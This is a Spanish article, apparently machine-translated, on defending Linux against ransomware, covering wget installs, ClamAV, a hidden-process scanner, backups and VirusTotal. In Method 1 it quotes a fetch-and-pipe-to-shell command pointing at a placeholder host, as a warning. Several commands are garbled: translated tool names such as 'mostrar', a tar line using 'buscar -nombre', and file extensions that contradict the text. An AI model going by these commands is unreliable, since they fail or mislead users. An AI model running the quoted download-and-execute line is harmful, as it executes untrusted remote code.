Cómo proteger Linux de ransomwares

El ransomware es uno de los problemas más amenazantes en el mundo de la seguridad de la red en la actualidad. Es aterrador pensar que alguien pueda retener sus datos como rehenes. Algunas infecciones de ransomware encriptan todos los datos en un volumen en particular, y las personas que están detrás exigen una cierta cantidad de dinero antes de acceder a liberar la clave necesaria para desbloquear dichos datos. Es especialmente preocupante para las personas que tienen una gran cantidad de dinero invertido en sus datos. Sin embargo, hay algunas buenas noticias para los usuarios de Linux.

En la mayoría de las situaciones, es difícil que el código de ransomware obtenga el control de algo más que el directorio de inicio de un usuario. Estos programas no tienen los permisos para descartar una instalación completa. Esta es la razón por la cual el ransomware de Linux es más un problema en los servidores donde los operadores siempre tienen acceso de root. El ransomware no debería ser un gran problema para los usuarios de Linux, y hay varios pasos a seguir para evitar que te suceda.

Método 1: Defensa contra ataques estilo BashCrypt

BasyCrypt es una prueba de concepto de ransomware que demostró que es posible infectar estructuras de servidores con este tipo de código malicioso. Esto proporciona una línea de base para el aspecto que podrían tener los paquetes de ransomware de Linux. Si bien actualmente son poco comunes, el mismo tipo de medidas preventivas de sentido común para los administradores de servidores de otras plataformas funcionan igual de bien aquí. El problema es que en entornos de nivel empresarial puede haber una gran cantidad de personas diferentes que utilizan un sistema host.

Si está ejecutando un servidor de correo, puede ser terriblemente difícil evitar que la gente haga tonterías. Haga todo lo posible para recordarles a todos que no abran archivos adjuntos de los que no estén seguros, y siempre escanee todo lo que esté en cuestión. Otra cosa que realmente puede ayudar a prevenir este tipo de ataques es observar cómo se instalan los archivos binarios con wget. Naturalmente, su servidor de correo probablemente carezca de un entorno de escritorio y probablemente use wget, apt-get, yum o pacman para administrar los paquetes que llegan. Es muy importante observar qué repositorios se utilizan en estas instalaciones. A veces verás un comando que quiere que ejecutes algo como wget https://www.thisisaprettybadcoderepo.webs/ -O- | sh, o podría estar dentro de un script de shell. De cualquier manera, no lo ejecute si no sabe para qué sirve ese repositorio.

Método 2: Instalar un paquete de escáner

Existen varias piezas de tecnología de escaneo de malware de código abierto. ClamAV es, con mucho, el más famoso, y puede instalarlo en muchas distribuciones basadas en apt usando:

sudo apt-get install clamav

Cuando esté instalado, man clamav debería explicar el uso en un lenguaje sencillo. Tenga en cuenta que si bien puede escanear y eliminar archivos infectados, en realidad no puede eliminar el código infeccioso de un archivo. Esta es una situación de todo o nada.

Hay un segundo escáner con el que quizás no estés familiarizado, pero es útil si lo que te asusta son los procesos ocultos. Nuevamente, si está utilizando una distribución basada en apt, emita este comando para instalar el escáner para mostrar:

sudo apt-get install mostrar

Cuando esté instalado, escriba:

sudo mostrar sistema

2016-11-24_215954

Esto hará un escaneo completo de su sistema en busca de procesos ocultos.

Método 4: Mantener copias de seguridad limpias a mano

Si bien esto ni siquiera debería ser un problema, ya que todos siempre deben hacer copias de seguridad, tener buenas copias de seguridad puede eliminar instantáneamente el ransomware. El escaso ransomware que hay en la plataforma Linux tiende a atacar archivos con extensiones que son específicas de las plataformas de desarrollo web. Esto significa que si tiene una tonelada de código .php, .xml o .js, querrá hacer una copia de seguridad de esto. Considere esta siguiente línea de código:

tar -cf copias de seguridad.tar $(buscar -nombre “*.ruby” -o -nombre “*.html”)

Esto debería crear un archivo de almacenamiento de cinta grande de cada archivo con las extensiones .ruby y .html dentro de una estructura de archivos. Luego se puede mover a un subdirectorio temporal diferente para extraerlo y asegurarse de que la creación funcionó correctamente.

Este archivo de cinta puede y debe trasladarse a un volumen externo. Por supuesto, puede usar la compresión .bz2, .gz o .xv antes de hacerlo. Es posible que desee crear copias de seguridad reflejadas copiándolas en dos volúmenes diferentes.

Método 5: uso de escáneres basados ​​en la web

Tal vez haya descargado un paquete RPM o DEB de un sitio que promete contener software útil. El software también se distribuye a través de 7z o archivos tar comprimidos. Los usuarios de dispositivos móviles también pueden recibir paquetes de Android en formato APK. Es fácil escanearlos con una herramienta directamente en su navegador. Apúntelo a https://www.virustotal.com/gui/, y una vez que se cargue la página, presione el botón “Elegir archivo”. Antes de cargar, tenga en cuenta que este es un servidor público. Si bien es seguro y lo ejecuta Alphabet Inc, transfiere archivos públicamente, lo que podría ser un problema en algunos entornos súper seguros. También está limitado a archivos de 128 MB.

Seleccione su archivo en el cuadro que aparece y seleccione abrir. El nombre del archivo aparecerá en la línea junto al botón después de que desaparezca el cuadro.

Haga clic en el botón azul grande “¡Escanéalo!” botón. Verá otro cuadro que indica que el sistema está cargando su archivo.

Si alguien ya revisó el archivo de antemano, le notificará sobre el informe anterior. Lo reconoce basándose en una suma SHA256, que funciona de la misma manera que las mismas herramientas de línea de comandos de Linux a las que está acostumbrado. De lo contrario, ejecutará un análisis completo con 53 programas de análisis diferentes. Algunos de ellos pueden agotar el tiempo de espera cuando se ejecuta el archivo, y estos resultados se pueden ignorar de forma segura.

Algunos programas pueden arrojar resultados diferentes a otros, por lo que es fácil eliminar los falsos positivos con este sistema. La mejor parte es que funciona entre diferentes plataformas, lo que lo hace igualmente atractivo independientemente de la distribución que tengas en los diferentes dispositivos. También funciona igual de bien desde distribuciones móviles como Android, por lo que nuevamente es una excelente manera de inspeccionar los paquetes APK antes de usarlos.

Leer siguiente

  • Linux From Scratch y más allá La versión 8.3 de Linux From Scratch utiliza Linux Kernel…
  • El kernel de Linux 4.19 recibirá una tonelada de actualizaciones de hardware de audio para mejorar Linux…
  • Windows 10 ahora tiene Arch Linux junto con Ubuntu , SUSE y otros Linux completos…
  • Red Hat Enterprise Linux 8 Beta ofrece Stratis y Yum 4 con Efficient Linux…

Related Posts